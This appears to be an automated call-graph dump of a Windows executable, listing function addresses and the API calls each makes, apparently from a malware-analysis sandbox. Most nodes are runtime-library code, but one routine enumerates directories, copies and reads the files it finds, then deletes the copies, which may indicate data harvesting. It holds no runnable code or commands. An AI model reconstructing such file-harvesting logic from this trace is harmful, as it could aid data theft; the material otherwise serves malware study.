6704->6709 6705->6688 6707 374d9c0c 6712 374d9c66 WriteFile 6707->6712 6713 374d9c20 6707->6713 6708 374d9bd3 6710 374d9bf9 6708->6710 6714 374d9bd7 6708->6714 6711 374d62ac 26 API calls 6709->6711 6755 374d9492 GetConsoleCP 6710->6755 6711->6688 6716 374d9c89 GetLastError 6712->6716 6722 374d9bef 6712->6722 6717 374d9c28 6713->6717 6718 374d9c56 6713->6718 6721 374d9ccd 6714->6721 6750 374d9645 6714->6750 6716->6722 6723 374d9c2d 6717->6723 6724 374d9c46 6717->6724 6781 374d9728 6718->6781 6721->6688 6726 374d6368 20 API calls 6721->6726 6722->6688 6722->6721 6728 374d9ca9 6722->6728 6723->6721 6766 374d9807 6723->6766 6773 374d98f5 6724->6773 6727 374d9cf2 6726->6727 6730 374d6355 20 API calls 6727->6730 6731 374d9cc4 6728->6731 6732 374d9cb0 6728->6732 6730->6688 6788 374d6332 6731->6788 6734 374d6368 20 API calls 6732->6734 6735 374d9cb5 6734->6735 6736 374d6355 20 API calls 6735->6736 6736->6688 6909 374d8c9e RtlLeaveCriticalSection 6737->6909 6739 374d9aea 6739->6668 6793 374d9f8d 6740->6793 6815 374d8dbc 6743->6815 6745 374d96c2 6746 374d96c7 6745->6746 6824 374d5af6 GetLastError 6745->6824 6746->6707 6746->6708 6748 374d96ea 6748->6746 6749 374d9708 GetConsoleMode 6748->6749 6749->6746 6751 374d969f 6750->6751 6754 374d966a 6750->6754 6751->6722 6752 374da181 WriteConsoleW CreateFileW 6752->6754 6753 374d96a1 GetLastError 6753->6751 6754->6751 6754->6752 6754->6753 6760 374d94f5 6755->6760 6762 374d9607 6755->6762 6756 374d2ada 5 API calls 6758 374d9641 6756->6758 6758->6722 6759 374d79e6 40 API calls 6759->6760 6760->6759 6761 374d957b WideCharToMultiByte 6760->6761 6760->6762 6765 374d95d2 WriteFile 6760->6765 6888 374d7c19 6760->6888 6761->6762 6763 374d95a1 WriteFile 6761->6763 6762->6756 6763->6760 6764 374d962a GetLastError 6763->6764 6764->6762 6765->6760 6765->6764 6770 374d9816 6766->6770 6767 374d98d8 6769 374d2ada 5 API calls 6767->6769 6768 374d9894 WriteFile 6768->6770 6771 374d98da GetLastError 6768->6771 6772 374d98f1 6769->6772 6770->6767 6770->6768 6771->6767 6772->6722 6775 374d9904 6773->6775 6774 374d9a0f 6776 374d2ada 5 API calls 6774->6776 6775->6774 6777 374d9986 WideCharToMultiByte 6775->6777 6779 374d99bb WriteFile 6775->6779 6778 374d9a1e 6776->6778 6777->6779 6780 374d9a07 GetLastError 6777->6780 6778->6722 6779->6775 6779->6780 6780->6774 6786 374d9737 6781->6786 6782 374d97ea 6783 374d2ada 5 API calls 6782->6783 6785 374d9803 6783->6785 6784 374d97a9 WriteFile 6784->6786 6787 374d97ec GetLastError 6784->6787 6785->6722 6786->6782 6786->6784 6787->6782 6789 374d6355 20 API calls 6788->6789 6790 374d633d 6789->6790 6791 374d6368 20 API calls 6790->6791 6792 374d6350 6791->6792 6792->6688 6802 374d8d52 6793->6802 6795 374d9f9f 6796 374d9fb8 SetFilePointerEx 6795->6796 6797 374d9fa7 6795->6797 6799 374d9fac 6796->6799 6800 374d9fd0 GetLastError 6796->6800 6798 374d6368 20 API calls 6797->6798 6798->6799 6799->6698 6801 374d6332 20 API calls 6800->6801 6801->6799 6803 374d8d5f 6802->6803 6804 374d8d74 6802->6804 6805 374d6355 20 API calls 6803->6805 6806 374d6355 20 API calls 6804->6806 6808 374d8d99 6804->6808 6807 374d8d64 6805->6807 6809 374d8da4 6806->6809 6810 374d6368 20 API calls 6807->6810 6808->6795 6811 374d6368 20 API calls 6809->6811 6812 374d8d6c 6810->6812 6813 374d8dac 6811->6813 6812->6795 6814 374d62ac 26 API calls 6813->6814 6814->6812 6816 374d8dc9 6815->6816 6817 374d8dd6 6815->6817 6818 374d6368 20 API calls 6816->6818 6819 374d8de2 6817->6819 6820 374d6368 20 API calls 6817->6820 6821 374d8dce 6818->6821 6819->6745 6822 374d8e03 6820->6822 6821->6745 6823 374d62ac 26 API calls 6822->6823 6823->6821 6825 374d5b0c 6824->6825 6826 374d5b12 6824->6826 6827 374d5e08 11 API calls 6825->6827 6828 374d637b 20 API calls 6826->6828 6830 374d5b61 SetLastError 6826->6830 6827->6826 6829 374d5b24 6828->6829 6831 374d5b2c 6829->6831 6832 374d5e5e 11 API calls 6829->6832 6830->6748 6834 374d571e 20 API calls 6831->6834 6833 374d5b41 6832->6833 6833->6831 6835 374d5b48 6833->6835 6836 374d5b32 6834->6836 6838 374d593c 20 API calls 6835->6838 6837 374d5b6d SetLastError 6836->6837 6844 374d55a8 6837->6844 6839 374d5b53 6838->6839 6841 374d571e 20 API calls 6839->6841 6843 374d5b5a 6841->6843 6843->6830 6843->6837 6855 374d7613 6844->6855 6848 374d55e0 6885 374d4bc1 6848->6885 6849 374d55c2 IsProcessorFeaturePresent 6852 374d55cd 6849->6852 6851 374d55b8 6851->6848 6851->6849 6854 374d60e2 8 API calls 6852->6854 6854->6848 6856 374d7581 RtlEnterCriticalSection RtlLeaveCriticalSection 6855->6856 6857 374d55ad 6856->6857 6857->6851 6858 374d766e 6857->6858 6859 374d767a 6858->6859 6860 374d5b7a 20 API calls 6859->6860 6864 374d76a7 6859->6864 6867 374d76a1 6859->6867 6860->6867 6861 374d76f3 6863 374d6368 20 API calls 6861->6863 6862 374d76d6 6866 374dbdc9 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6862->6866 6865 374d76f8 6863->6865 6869 374d5671 RtlEnterCriticalSection 6864->6869 6871 374d771f 6864->6871 6868 374d62ac 26 API calls 6865->6868 6870 374d7875 6866->6870 6867->6861 6867->6862 6867->6864 6868->6862 6869->6871 6870->6851 6872 374d777e 6871->6872 6874 374d7776 6871->6874 6876 374d56b9 RtlLeaveCriticalSection 6871->6876 6882 374d77a9 6871->6882 6878 374d7665 38 API calls 6872->6878 6872->6882 6873 374d782e RtlLeaveCriticalSection 6875 374d77fd 6873->6875 6877 374d4bc1 28 API calls 6874->6877 6875->6862 6879 374d5af6 38 API calls 6875->6879 6883 374d780c 6875->6883 6876->6874 6877->6872 6880 374d779f 6878->6880 6879->6883 6881 374d7665 38 API calls 6880->6881 6881->6882 6882->6873 6883->6862 6884 374d5af6 38 API calls 6883->6884 6884->6862 6886 374d499b 28 API calls 6885->6886 6887 374d4bd2 6886->6887 6889 374d5af6 38 API calls 6888->6889 6890 374d7c24 6889->6890 6893 374d7a00 6890->6893 6894 374d7a28 6893->6894 6895 374d7a13 6893->6895 6894->6760 6895->6894 6897 374d7f0f 6895->6897 6898 374d7f1b 6897->6898 6899 374d5af6 38 API calls 6898->6899 6900 374d7f24 6899->6900 6901 374d7f72 6900->6901 6902 374d5671 RtlEnterCriticalSection 6900->6902 6901->6894 6903 374d7f42 6902->6903 6904 374d7f86 20 API calls 6903->6904 6905 374d7f56 6904->6905 6906 374d7f75 RtlLeaveCriticalSection 6905->6906 6907 374d7f69 6906->6907 6907->6901 6908 374d55a8 38 API calls 6907->6908 6908->6901 6909->6739 6913 374dad24 6910->6913 6912 374dadca 6912->6654 6914 374dad30 6913->6914 6924 374d8c7b RtlEnterCriticalSection 6914->6924 6916 374dad3e 6917 374dad65 6916->6917 6918 374dad70 6916->6918 6925 374dae4d 6917->6925 6920 374d6368 20 API calls 6918->6920 6921 374dad6b 6920->6921 6940 374dad9a 6921->6940 6923 374dad8d 6923->6912 6924->6916 6926 374d8d52 26 API calls 6925->6926 6927 374dae5d 6926->6927 6928 374dae63 6927->6928 6930 374dae95 6927->6930 6931 374d8d52 26 API calls 6927->6931 6943 374d8cc1 6928->6943 6930->6928 6932 374d8d52 26 API calls 6930->6932 6934 374dae8c 6931->6934 6935 374daea1 CloseHandle 6932->6935 6937 374d8d52 26 API calls 6934->6937 6935->6928 6938 374daead GetLastError 6935->6938 6936 374daedd 6936->6921 6937->6930 6938->6928 6939 374d6332 20 API calls 6939->6936 6952 374d8c9e RtlLeaveCriticalSection 6940->6952 6942 374dada4 6942->6923 6944 374d8d37 6943->6944 6945 374d8cd0 6943->6945 6946 374d6368 20 API calls 6944->6946 6945->6944 6951 374d8cfa 6945->6951 6947 374d8d3c 6946->6947 6948 374d6355 20 API calls 6947->6948 6949 374d8d27 6948->6949 6949->6936 6949->6939 6950 374d8d21 SetStdHandle 6950->6949 6951->6949 6951->6950 6952->6942 6953->6628 6954->6608 7677 374d508a 7678 374d509c 7677->7678 7679 374d50a2 7677->7679 7680 374d5000 20 API calls 7678->7680 7680->7679 6955 374da945 6957 374da96d 6955->6957 6956 374da9a5 6957->6956 6958 374da99e 6957->6958 6959 374da997 6957->6959 6968 374daa00 6958->6968 6964 374daa17 6959->6964 6965 374daa20 6964->6965 6972 374db19b 6965->6972 6969 374daa20 6968->6969 6970 374db19b 21 API calls 6969->6970 6971 374da9a3 6970->6971 6973 374db1da 6972->6973 6977 374db25c 6973->6977 6982 374db59e 6973->6982 6975 374db286 6978 374db292 6975->6978 6989 374db8b2 6975->6989 6977->6975 6985 374d78a3 6977->6985 6980 374d2ada 5 API calls 6978->6980 6981 374da99c 6980->6981 6996 374db5c1 6982->6996 6986 374d78cb 6985->6986 6987 374d2ada 5 API calls 6986->6987 6988 374d78e8 6987->6988 6988->6975 6990 374db8bf 6989->6990 6991 374db8d4 6989->6991 6992 374db8d9 6990->6992 6994 374d6368 20 API calls 6990->6994 6993 374d6368 20 API calls 6991->6993 6992->6978 6993->6992 6995 374db8cc 6994->6995 6995->6978 6997 374db5ec 6996->6997 6998 374db7e5 RaiseException 6997->6998 6999 374db5bc 6998->6999 6999->6977 7176 374d7bc7 7177 374d7bd3 7176->7177 7178 374d7c0a 7177->7178 7184 374d5671 RtlEnterCriticalSection 7177->7184 7180 374d7be7 7185 374d7f86 7180->7185 7184->7180 7186 374d7f94 7185->7186 7187 374d7bf7 7185->7187 7186->7187 7192 374d7cc2 7186->7192 7189 374d7c10 7187->7189 7306 374d56b9 RtlLeaveCriticalSection 7189->7306 7191 374d7c17 7191->7178 7193 374d7d42 7192->7193 7197 374d7cd8 7192->7197 7194 374d7d90 7193->7194 7196 374d571e 20 API calls 7193->7196 7260 374d7e35 7194->7260 7198 374d7d64 7196->7198 7197->7193 7199 374d7d0b 7197->7199 7201 374d571e 20 API calls 7197->7201 7200 374d571e 20 API calls 7198->7200 7208 374d571e 20 API calls 7199->7208 7219 374d7d2d 7199->7219 7202 374d7d77 7200->7202 7206 374d7d00 7201->7206 7207 374d571e 20 API calls 7202->7207 7203 374d571e 20 API calls 7209 374d7d37 7203->7209 7204 374d7dfe 7210 374d571e 20 API calls 7204->7210 7205 374d7d9e 7205->7204 7211 374d571e 20 API calls 7205->7211 7220 374d90ba 7206->7220 7213 374d7d85 7207->7213 7214 374d7d22 7208->7214 7215 374d571e 20 API calls 7209->7215 7216 374d7e04 7210->7216 7211->7205 7217 374d571e 20 API calls 7213->7217 7248 374d91b8 7214->7248 7215->7193 7216->7187 7217->7194 7219->7203 7221 374d90cb 7220->7221 7247 374d91b4 7220->7247 7222 374d90dc 7221->7222 7223 374d571e 20 API calls 7221->7223 7224 374d571e 20 API calls 7222->7224 7226 374d90ee 7222->7226 7223->7222 7224->7226 7225 374d9100 7228 374d9112 7225->7228 7229 374d571e 20 API calls 7225->7229 7226->7225 7227 374d571e 20 API calls 7226->7227 7227->7225 7230 374d9124 7228->7230 7232 374d571e 20 API calls 7228->7232 7229->7228 7231 374d9136 7230->7231 7233 374d571e 20 API calls 7230->7233 7234 374d9148 7231->7234 7235 374d571e 20 API calls 7231->7235 7232->7230 7233->7231 7236 374d915a 7234->7236 7237 374d571e 20 API calls 7234->7237 7235->7234 7238 374d916c 7236->7238 7240 374d571e 20 API calls 7236->7240 7237->7236 7239 374d917e 7238->7239 7241 374d571e 20 API calls 7238->7241 7242 374d9190 7239->7242 7243 374d571e 20 API calls 7239->7243 7240->7238 7241->7239 7244 374d91a2 7242->7244 7245 374d571e 20 API calls 7242->7245 7243->7242 7246 374d571e 20 API calls 7244->7246 7244->7247 7245->7244 7246->7247 7247->7199 7249 374d921d 7248->7249 7250 374d91c5 7248->7250 7249->7219 7251 374d91d5 7250->7251 7252 374d571e 20 API calls 7250->7252 7253 374d91e7 7251->7253 7255 374d571e 20 API calls 7251->7255 7252->7251 7254 374d91f9 7253->7254 7256 374d571e 20 API calls 7253->7256 7257 374d920b 7254->7257 7258 374d571e 20 API calls 7254->7258 7255->7253 7256->7254 7257->7249 7259 374d571e 20 API calls 7257->7259 7258->7257 7259->7249 7261 374d7e60 7260->7261 7262 374d7e42 7260->7262 7261->7205 7262->7261 7266 374d925d 7262->7266 7265 374d571e 20 API calls 7265->7261 7267 374d7e5a 7266->7267 7268 374d926e 7266->7268 7267->7265 7302 374d9221 7268->7302 7271 374d9221 20 API calls 7272 374d9281 7271->7272 7273 374d9221 20 API calls 7272->7273 7274 374d928c 7273->7274 7275 374d9221 20 API calls 7274->7275 7276 374d9297 7275->7276 7277 374d9221 20 API calls 7276->7277 7278 374d92a5 7277->7278 7279 374d571e 20 API calls 7278->7279 7280 374d92b0 7279->7280 7281 374d571e 20 API calls 7280->7281 7282 374d92bb 7281->7282 7283 374d571e 20 API calls 7282->7283 7284 374d92c6 7283->7284 7285 374d9221 20 API calls 7284->7285 7286 374d92d4 7285->7286 7287 374d9221 20 API calls 7286->7287 7288 374d92e2 7287->7288 7289 374d9221 20 API calls 7288->7289 7290 374d92f3 7289->7290 7291 374d9221 20 API calls 7290->7291 7292 374d9301 7291->7292 7293 374d9221 20 API calls 7292->7293 7294 374d930f 7293->7294 7295 374d571e 20 API calls 7294->7295 7296 374d931a 7295->7296 7297 374d571e 20 API calls 7296->7297 7298 374d9325 7297->7298 7299 374d571e 20 API calls 7298->7299 7300 374d9330 7299->7300 7301 374d571e 20 API calls 7300->7301 7301->7267 7303 374d9258 7302->7303 7304 374d9248 7302->7304 7303->7271 7304->7303 7305 374d571e 20 API calls 7304->7305 7305->7304 7306->7191 7307 374da1c6 IsProcessorFeaturePresent 7000 374d8640 7003 374d8657 7000->7003 7004 374d8679 7003->7004 7005 374d8665 7003->7005 7007 374d8681 7004->7007 7008 374d8693 7004->7008 7006 374d6368 20 API calls 7005->7006 7009 374d866a 7006->7009 7010 374d6368 20 API calls 7007->7010 7014 374d8652 7008->7014 7016 374d54a7 7008->7016 7012 374d62ac 26 API calls 7009->7012 7013 374d8686 7010->7013 7012->7014 7015 374d62ac 26 API calls 7013->7015 7015->7014 7017 374d54c4 7016->7017 7023 374d54ba 7016->7023 7018 374d5af6 38 API calls 7017->7018 7017->7023 7019 374d54e5 7018->7019 7020 374d7a00 38 API calls 7019->7020 7021 374d54fe 7020->7021 7024 374d7a2d 7021->7024 7023->7014 7025 374d7a55 7024->7025 7026 374d7a40 7024->7026 7025->7023 7026->7025 7028 374d6d7e 7026->7028 7029 374d6d8a 7028->7029 7030 374d5af6 38 API calls 7029->7030 7035 374d6d94 7030->7035 7032 374d6e18 7032->7025 7033 374d55a8 38 API calls 7033->7035 7035->7032 7035->7033 7036 374d571e 20 API calls 7035->7036 7037 374d5671 RtlEnterCriticalSection 7035->7037 7038 374d6e0f 7035->7038 7036->7035 7037->7035 7041 374d56b9 RtlLeaveCriticalSection 7038->7041 7040 374d6e16 7040->7035 7041->7040 7681 374d7a80 7682 374d7a8d 7681->7682 7683 374d637b 20 API calls 7682->7683 7684 374d7aa7 7683->7684 7685 374d571e 20 API calls 7684->7685 7686 374d7ab3 7685->7686 7687 374d7ad9 7686->7687 7688 374d637b 20 API calls 7686->7688 7689 374d5eb7 11 API calls 7687->7689 7692 374d7ae5 7687->7692 7690 374d7acd 7688->7690 7689->7687 7691 374d571e 20 API calls 7690->7691 7691->7687 7042 374daf43 7043 374daf4d 7042->7043 7044 374daf59 7042->7044 7043->7044 7045 374daf52 CloseHandle 7043->7045 7045->7044 7125 374d5303 7128 374d50a5 7125->7128 7137 374d502f 7128->7137 7131 374d502f 5 API calls 7132 374d50c3 7131->7132 7133 374d5000 20 API calls 7132->7133 7134 374d50ce 7133->7134 7135 374d5000 20 API calls 7134->7135 7136 374d50d9 7135->7136 7139 374d5048 7137->7139 7138 374d2ada 5 API calls 7140 374d5069 7138->7140 7139->7138 7140->7131 7141 374d7103 GetCommandLineA GetCommandLineW 7308 374d4bdd 7309 374d4bec 7308->7309 7310 374d4c08 7308->7310 7309->7310 7312 374d4bf2 7309->7312 7331 374d6d60 7310->7331 7314 374d6368 20 API calls 7312->7314 7316 374d4bf7 7314->7316 7315 374d4c33 7335 374d4d01 7315->7335 7317 374d62ac 26 API calls 7316->7317 7318 374d4c01 7317->7318 7323 374d4c66 7325 374d6368 20 API calls 7323->7325 7324 374d4c72 7326 374d4d01 38 API calls 7324->7326 7327 374d4c6b 7325->7327 7328 374d4c88 7326->7328 7329 374d571e 20 API calls 7327->7329 7328->7327 7330 374d571e 20 API calls 7328->7330 7329->7318 7330->7327 7332 374d6d69 7331->7332 7333 374d4c0f GetModuleFileNameA 7331->7333 7347 374d6c5f 7332->7347 7333->7315 7337 374d4d26 7335->7337 7339 374d4d86 7337->7339 7503 374d70eb 7337->7503 7338 374d4c50 7341 374d4e76 7338->7341 7339->7338 7340 374d70eb 38 API calls 7339->7340 7340->7339 7342 374d4e8b 7341->7342 7343 374d4c5d 7341->7343 7342->7343 7344 374d637b 20 API calls 7342->7344 7343->7323 7343->7324 7345 374d4eb9 7344->7345 7346 374d571e 20 API calls 7345->7346 7346->7343 7348 374d5af6 38 API calls 7347->7348 7349 374d6c6c 7348->7349 7350 374d6d7e 38 API calls 7349->7350 7351 374d6c74 7350->7351 7367 374d69f3 7351->7367 7354 374d6c8b 7354->7333 7357 374d6cce 7360 374d571e 20 API calls 7357->7360 7360->7354 7361 374d6cc9 7362 374d6368 20 API calls 7361->7362 7362->7357 7363 374d6d12 7363->7357 7391 374d68c9 7363->7391 7364 374d6ce6 7364->7363 7365 374d571e 20 API calls 7364->7365 7365->7363 7368 374d54a7 38 API calls 7367->7368 7369 374d6a05 7368->7369 7370 374d6a14 GetOEMCP 7369->7370 7371 374d6a26 7369->7371 7372 374d6a3d 7370->7372 7371->7372 7373 374d6a2b GetACP 7371->7373 7372->7354 7374 374d56d0 7372->7374 7373->7372 7375 374d570e 7374->7375 7379 374d56de 7374->7379 7377 374d6368 20 API calls 7375->7377 7376 374d56f9 RtlAllocateHeap 7378 374d570c 7376->7378 7376->7379 7377->7378 7378->7357 7381 374d6e20 7378->7381 7379->7375 7379->7376 7380 374d474f 7 API calls 7379->7380 7380->7379 7382 374d69f3 40 API calls 7381->7382 7383 374d6e3f 7382->7383 7385 374d6e90 IsValidCodePage 7383->7385 7388 374d6e46 7383->7388 7390 374d6eb5 7383->7390 7384 374d2ada 5 API calls 7386 374d6cc1 7384->7386 7387 374d6ea2 GetCPInfo 7385->7387 7385->7388 7386->7361 7386->7364 7387->7388 7387->7390 7388->7384 7394 374d6acb GetCPInfo 7390->7394 7467 374d6886 7391->7467 7393 374d68ed 7393->7357 7395 374d6baf 7394->7395 7396 374d6b05 7394->7396 7398 374d2ada 5 API calls 7395->7398 7404 374d86e4 7396->7404 7400 374d6c5b 7398->7400 7400->7388 7403 374d8a3e 43 API calls 7403->7395 7405 374d54a7 38 API calls 7404->7405 7406 374d8704 MultiByteToWideChar 7405->7406 7409 374d8742 7406->7409 7415 374d87da 7406->7415 7408 374d2ada 5 API calls 7412 374d6b66 7408->7412 7410 374d8763 7409->7410 7411 374d56d0 21 API calls 7409->7411 7413 374d87d4 7410->7413 7416 374d87a8 MultiByteToWideChar 7410->7416 7411->7410 7418 374d8a3e 7412->7418 7423 374d8801 7413->7423 7415->7408 7416->7413 7417 374d87c4 GetStringTypeW 7416->7417 7417->7413 7419 374d54a7 38 API calls 7418->7419 7420 374d8a51 7419->7420 7427 374d8821 7420->7427 7424 374d880d 7423->7424 7426 374d881e 7423->7426 7425 374d571e 20 API calls 7424->7425 7424->7426 7425->7426 7426->7415 7428 374d883c 7427->7428 7429 374d8862 MultiByteToWideChar 7428->7429 7430 374d888c 7429->7430 7439 374d8a16 7429->7439 7432 374d88ad 7430->7432 7434 374d56d0 21 API calls 7430->7434 7431 374d2ada 5 API calls 7433 374d6b87 7431->7433 7435 374d88f6 MultiByteToWideChar 7432->7435 7450 374d8962 7432->7450 7433->7403 7434->7432 7436 374d890f 7435->7436 7435->7450 7454 374d5f19 7436->7454 7438 374d8801 20 API calls 7438->7439 7439->7431 7441 374d8939 7443 374d5f19 11 API calls 7441->7443 7441->7450 7442 374d8971 7445 374d56d0 21 API calls 7442->7445 7448 374d8992 7442->7448 7443->7450 7444 374d8a07 7447 374d8801 20 API calls 7444->7447 7445->7448 7446 374d5f19 11 API calls 7449 374d89e6 7446->7449 7447->7450 7448->7444 7448->7446 7449->7444 7451 374d89f5 WideCharToMultiByte 7449->7451 7450->7438 7451->7444 7452 374d8a35 7451->7452 7453 374d8801 20 API calls 7452->7453 7453->7450 7455 374d5c45 5 API calls 7454->7455 7456 374d5f40 7455->7456 7459 374d5f49 7456->7459 7462 374d5fa1 7456->7462 7460 374d2ada 5 API calls 7459->7460 7461 374d5f9b 7460->7461 7461->7441 7461->7442 7461->7450 7463 374d5c45 5 API calls 7462->7463 7464 374d5fc8 7463->7464 7465 374d2ada 5 API calls 7464->7465 7466 374d5f89 LCMapStringW 7465->7466 7466->7459 7468 374d6892 7467->7468 7475 374d5671 RtlEnterCriticalSection 7468->7475 7470 374d689c 7476 374d68f1 7470->7476 7474 374d68b5 7474->7393 7475->7470 7488 374d7011 7476->7488 7478 374d693f 7479 374d7011 26 API calls 7478->7479 7480 374d695b 7479->7480 7481 374d7011 26 API calls 7480->7481 7482 374d6979 7481->7482 7483 374d68a9 7482->7483 7484 374d571e 20 API calls 7482->7484 7485 374d68bd 7483->7485 7484->7483 7502 374d56b9 RtlLeaveCriticalSection 7485->7502 7487 374d68c7 7487->7474 7489 374d7022 7488->7489 7493 374d701e 7488->7493 7490 374d7029 7489->7490 7495 374d703c 7489->7495 7491 374d6368 20 API calls 7490->7491 7492 374d702e 7491->7492 7494 374d62ac 26 API calls 7492->7494 7493->7478 7494->7493 7495->7493 7496 374d706a 7495->7496 7497 374d7073 7495->7497 7498 374d6368 20 API calls 7496->7498 7497->7493 7499 374d6368 20 API calls 7497->7499 7500 374d706f 7498->7500 7499->7500 7501 374d62ac 26 API calls 7500->7501 7501->7493 7502->7487 7506 374d7092 7503->7506 7507 374d54a7 38 API calls 7506->7507 7508 374d70a6 7507->7508 7508->7337 7142 374d281c 7143 374d2882 27 API calls 7142->7143 7144 374d282a 7143->7144 6312 374d1c5b 6313 374d1c6b 6312->6313 6316 374d12ee 6313->6316 6315 374d1c87 6317 374d1324 6316->6317 6318 374d13b7 GetEnvironmentVariableW 6317->6318 6342 374d10f1 6318->6342 6321 374d10f1 57 API calls 6322 374d1465 6321->6322 6323 374d10f1 57 API calls 6322->6323 6324 374d1479 6323->6324 6325 374d10f1 57 API calls 6324->6325 6326 374d148d 6325->6326 6327 374d10f1 57 API calls 6326->6327 6328 374d14a1 6327->6328 6329 374d10f1 57 API calls 6328->6329 6330 374d14b5 lstrlenW 6329->6330 6331 374d14d9 lstrlenW 6330->6331 6332 374d14d2 6330->6332 6333 374d10f1 57 API calls 6331->6333 6332->6315 6334 374d1501 lstrlenW lstrcatW 6333->6334 6335 374d10f1 57 API calls 6334->6335 6336 374d1539 lstrlenW lstrcatW 6335->6336 6337 374d10f1 57 API calls 6336->6337 6338 374d156b lstrlenW lstrcatW 6337->6338 6339 374d10f1 57 API calls 6338->6339 6340 374d159d lstrlenW lstrcatW 6339->6340 6341 374d10f1 57 API calls 6340->6341 6341->6332 6343 374d1118 6342->6343 6344 374d1129 lstrlenW 6343->6344 6355 374d2c40 6344->6355 6347 374d1168 lstrlenW 6348 374d1177 lstrlenW FindFirstFileW 6347->6348 6349 374d11e1 6348->6349 6350 374d11a0 6348->6350 6349->6321 6351 374d11aa 6350->6351 6352 374d11c7 FindNextFileW 6350->6352 6351->6352 6357 374d1000 6351->6357 6352->6350 6354 374d11da FindClose 6352->6354 6354->6349 6356 374d1148 lstrcatW lstrlenW 6355->6356 6356->6347 6356->6348 6358 374d1022 6357->6358 6359 374d10af 6358->6359 6360 374d102f lstrcatW lstrlenW 6358->6360 6361 374d10ad 6359->6361 6362 374d10b5 lstrlenW 6359->6362 6363 374d106b lstrlenW 6360->6363 6364 374d105a lstrlenW 6360->6364 6361->6351 6388 374d1e16 6362->6388 6374 374d1e89 lstrlenW 6363->6374 6364->6363 6367 374d10ca 6367->6361 6370 374d1e89 5 API calls 6367->6370 6368 374d1088 GetFileAttributesW 6368->6361 6369 374d109c 6368->6369 6369->6361 6380 374d173a 6369->6380 6371 374d10df 6370->6371 6393 374d11ea 6371->6393 6375 374d2c40 6374->6375 6376 374d1ea7 lstrcatW lstrlenW 6375->6376 6377 374d1ed1 lstrcatW 6376->6377 6378 374d1ec2 6376->6378 6377->6368 6378->6377 6379 374d1ec7 lstrlenW 6378->6379 6379->6377 6381 374d1747 6380->6381 6408 374d1cca 6381->6408 6385 374d199f 6385->6361 6386 374d1824 6386->6385 6428 374d15da 6386->6428 6389 374d1e29 6388->6389 6392 374d1e4c 6388->6392 6390 374d1e2d lstrlenW 6389->6390 6389->6392 6391 374d1e3f lstrlenW 6390->6391 6390->6392 6391->6392 6392->6367 6394 374d120e 6393->6394 6395 374d1e89 5 API calls 6394->6395 6396 374d1220 GetFileAttributesW 6395->6396 6397 374d1246 6396->6397 6398 374d1235 6396->6398 6399 374d1e89 5 API calls 6397->6399 6398->6397 6400 374d173a 35 API calls 6398->6400 6401 374d1258 6399->6401 6400->6397 6402 374d10f1 56 API calls 6401->6402 6403 374d126d 6402->6403 6404 374d1e89 5 API calls 6403->6404 6405 374d127f 6404->6405 6406 374d10f1 56 API calls 6405->6406 6407 374d12e6 6406->6407 6407->6361 6409 374d1cf1 6408->6409 6410 374d1d0f CopyFileW CreateFileW 6409->6410 6411 374d1d55 GetFileSize 6410->6411 6412 374d1d44 DeleteFileW 6410->6412 6413 374d1ede 22 API calls 6411->6413 6417 374d1808 6412->6417 6414 374d1d66 ReadFile 6413->6414 6415 374d1d7d CloseHandle DeleteFileW 6414->6415 6416 374d1d94 CloseHandle DeleteFileW 6414->6416 6415->6417 6416->6417 6417->6385 6418 374d1ede 6417->6418 6420 374d222f 6418->6420 6421 374d224e 6420->6421 6424 374d2250 6420->6424 6436 374d474f 6420->6436 6441 374d47e5 6420->6441 6421->6386 6423 374d2908 6425 374d35d2 RaiseException 6423->6425 6424->6423 6448 374d35d2 6424->6448 6427 374d2925 6425->6427 6427->6386 6429 374d160c 6428->6429 6430 374d163c lstrlenW 6429->6430 6462 374d1c9d 6430->6462 6432 374d1655 lstrcatW lstrlenW 6433 374d1678 6432->6433 6434 374d167e lstrcatW 6433->6434 6435 374d1693 6433->6435 6434->6435 6435->6386 6451 374d4793 6436->6451 6438 374d2ada 5 API calls 6439 374d478f 6438->6439 6439->6420 6440 374d4765 6440->6438 6446 374d56d0 6441->6446 6442 374d570e 6444 374d6368 20 API calls 6442->6444 6443 374d56f9 RtlAllocateHeap 6445 374d570c 6443->6445 6443->6446 6444->6445 6445->6420 6446->6442 6446->6443 6447 374d474f 7 API calls 6446->6447 6447->6446 6449 374d35f2 RaiseException 6448->6449 6449->6423 6452 374d479f 6451->6452 6457 374d5671 RtlEnterCriticalSection 6452->6457 6454 374d47aa 6458 374d47dc 6454->6458 6456 374d47d1 6456->6440 6457->6454 6461 374d56b9 RtlLeaveCriticalSection 6458->6461 6460 374d47e3 6460->6456 6461->6460 6463 374d1ca6 6462->6463 6463->6432 7693 374d4a9a 7696 374d5411 7693->7696 7697 374d541d 7696->7697 7698 374d5af6 38 API calls 7697->7698 7701 374d5422 7698->7701 7699 374d55a8 38 API calls 7700 374d544c 7699->7700 7701->7699 7509 374d73d5 7510 374d73e1 7509->7510 7521 374d5671 RtlEnterCriticalSection 7510->7521 7512 374d73e8 7522 374d8be3 7512->7522 7514 374d73f7 7520 374d7406 7514->7520 7535 374d7269 GetStartupInfoW 7514->7535 7518 374d7417 7546 374d7422 7520->7546 7521->7512 7523 374d8bef 7522->7523 7524 374d8bfc 7523->7524 7525 374d8c13 7523->7525 7527 374d6368 20 API calls 7524->7527 7549 374d5671 RtlEnterCriticalSection 7525->7549 7528 374d8c01 7527->7528 7529 374d62ac 26 API calls 7528->7529 7530 374d8c0b 7529->7530 7530->7514 7531 374d8c4b 7557 374d8c72 7531->7557 7532 374d8c1f 7532->7531 7550 374d8b34 7532->7550 7536 374d7318 7535->7536 7537 374d7286 7535->7537 7541 374d731f 7536->7541 7537->7536 7538 374d8be3 27 API calls 7537->7538 7540 374d72af 7538->7540 7539 374d72dd GetFileType 7539->7540 7540->7536 7540->7539 7542 374d7326 7541->7542 7543 374d7369 GetStdHandle 7542->7543 7544 374d73d1 7542->7544 7545 374d737c GetFileType 7542->7545 7543->7542 7544->7520 7545->7542 7561 374d56b9 RtlLeaveCriticalSection 7546->7561 7548 374d7429 7548->7518 7549->7532 7551 374d637b 20 API calls 7550->7551 7556 374d8b46 7551->7556 7552 374d8b53 7553 374d571e 20 API calls 7552->7553 7555 374d8ba5 7553->7555 7554 374d5eb7 11 API calls 7554->7556 7555->7532 7556->7552 7556->7554 7560 374d56b9 RtlLeaveCriticalSection 7557->7560 7559 374d8c79 7559->7530 7560->7559 7561->7548 7562 374d4ed7 7563 374d6d60 51 API calls 7562->7563 7564 374d4ee9 7563->7564 7573 374d7153 GetEnvironmentStringsW 7564->7573 